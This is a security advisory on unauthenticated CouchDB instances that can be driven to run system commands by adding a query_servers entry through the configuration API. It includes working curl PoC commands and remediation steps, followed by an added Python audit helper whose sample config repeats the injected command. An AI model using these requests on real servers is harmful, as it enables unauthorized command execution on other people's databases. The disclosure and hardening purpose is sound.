Ali Cloud Security · 2016/05/19 9:06

0x00 Preface


On May 16, the Ali Cloud Shield attack and defense team learned from external channels that CouchDB is exposed to unauthorized access when it is misconfigured. After testing, the Cloud Shield team was the first to find that this unauthorized access not only leads to data loss and disclosure, but also allows arbitrary system commands to be executed. The Cloud Shield security expert team immediately reported the vulnerability, assigned it a severity rating, and notified all potentially affected users. The origin and technical details of the vulnerability are explained below.

0x01 Origin of the Vulnerability


CouchDB is an open source document-oriented database management system accessed through a RESTful JavaScript Object Notation (JSON) API. By default, CouchDB exposes this RESTful API for database management on port 5984.

So where is the problem? Looking through the official documentation, CouchDB has a query_servers configuration section, described as follows:

CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.

In other words, CouchDB lets you specify a binary program or script that CouchDB hands data to for processing. The query_servers section of the local.ini configuration file has this format:

[query_servers]
LANGUAGE = PATH ARGS

By default, two query servers are already defined in the configuration file:

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js

As you can see, CouchDB runs external binaries defined under query_servers. If this configuration can be changed, the database can be made to execute commands, but the configuration lives in the local.ini file. How can it be controlled?

One interesting point in CouchDB's documentation is that it provides an API to change the configuration and persist the changes to the configuration file:

The CouchDB Server Configuration API provides an interface to query and update the various configuration values within a running CouchDB instance.

That is, in addition to the local.ini configuration file, CouchDB allows configuration properties to be modified dynamically through its own RESTful API. Combined with the above, a CouchDB instance that requires no authentication can be made to execute system commands by modifying its query_servers configuration.

0x02 Vulnerability PoC


Add a query_servers entry; here it runs the ifconfig command:

curl -X PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/sbin/ifconfig >/tmp/6666"'

Create a test database and insert a document:

curl -X PUT 'http://1.1.1.1:5984/vultest'
curl -X PUT 'http://1.1.1.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

Invoke the new query server to process the data:

curl -X POST 'http://1.1.1.1:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'

After the request is processed, you can see that the specified command has been executed on the server.

How to get the output of the executed command back is left to the reader; discussion is welcome.

0x03 Remediation Suggestions


1. In /etc/couchdb/local.ini, find bind_address = 0.0.0.0 and change 0.0.0.0 to 127.0.0.1, then save. Note: CouchDB will then be reachable only from the local machine.

2. Set an admin password (CouchDB must be restarted for it to take effect). In /etc/couchdb/local.ini, find the [admins] section and configure the password there.
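The following audit helper is an added example, not code from the Ali Cloud post or from the CouchDB project. It checks a local.ini, or the JSON body returned by GET /_config/query_servers, for the three conditions discussed above: a bind_address other than 127.0.0.1, an empty [admins] section, and query_servers entries beyond the two shipped defaults. Both sample configurations are constructed for the example.

```python
import configparser
import json

# Constructed sample of a weak /etc/couchdb/local.ini (not from a real host):
# exposed on all interfaces, no admins, and a foreign query server added.
WEAK_LOCAL_INI = """
[httpd]
bind_address = 0.0.0.0

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js
cmd = /sbin/ifconfig >/tmp/6666

[admins]
"""

# Constructed sample of the hardened configuration the post recommends.
HARDENED_LOCAL_INI = """
[httpd]
bind_address = 127.0.0.1

[admins]
admin = -hashed-PLACEHOLDER_HASH,PLACEHOLDER_SALT
"""

# Query servers that ship with CouchDB 1.x; anything else deserves a look.
EXPECTED_QUERY_SERVERS = {"javascript", "coffeescript"}


def audit_local_ini(text):
    """Return a list of findings for the three issues described in the post."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.optionxform = str  # keep option names as written
    cp.read_string(text)
    findings = []
    bind = cp.get("httpd", "bind_address", fallback="127.0.0.1").strip()
    if bind != "127.0.0.1":
        findings.append(f"httpd.bind_address is {bind}; expected 127.0.0.1")
    if not cp.has_section("admins") or not dict(cp.items("admins")):
        findings.append("no [admins] entries: instance runs in admin party mode")
    servers = cp.options("query_servers") if cp.has_section("query_servers") else []
    for lang in servers:
        if lang not in EXPECTED_QUERY_SERVERS:
            findings.append(f"unexpected query server '{lang}' = {cp.get('query_servers', lang)}")
    return findings


def unexpected_query_servers(body):
    """Same check applied to the JSON returned by GET /_config/query_servers."""
    return sorted(set(json.loads(body)) - EXPECTED_QUERY_SERVERS)
```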

References:

  • blog.rot13.org/2010/11/tri…
  • docs.couchdb.org/en/1.6.1/ap…
  • docs.couchdb.org/en/1.6.1/in…
  • docs.couchdb.org/en/1.6.1/co…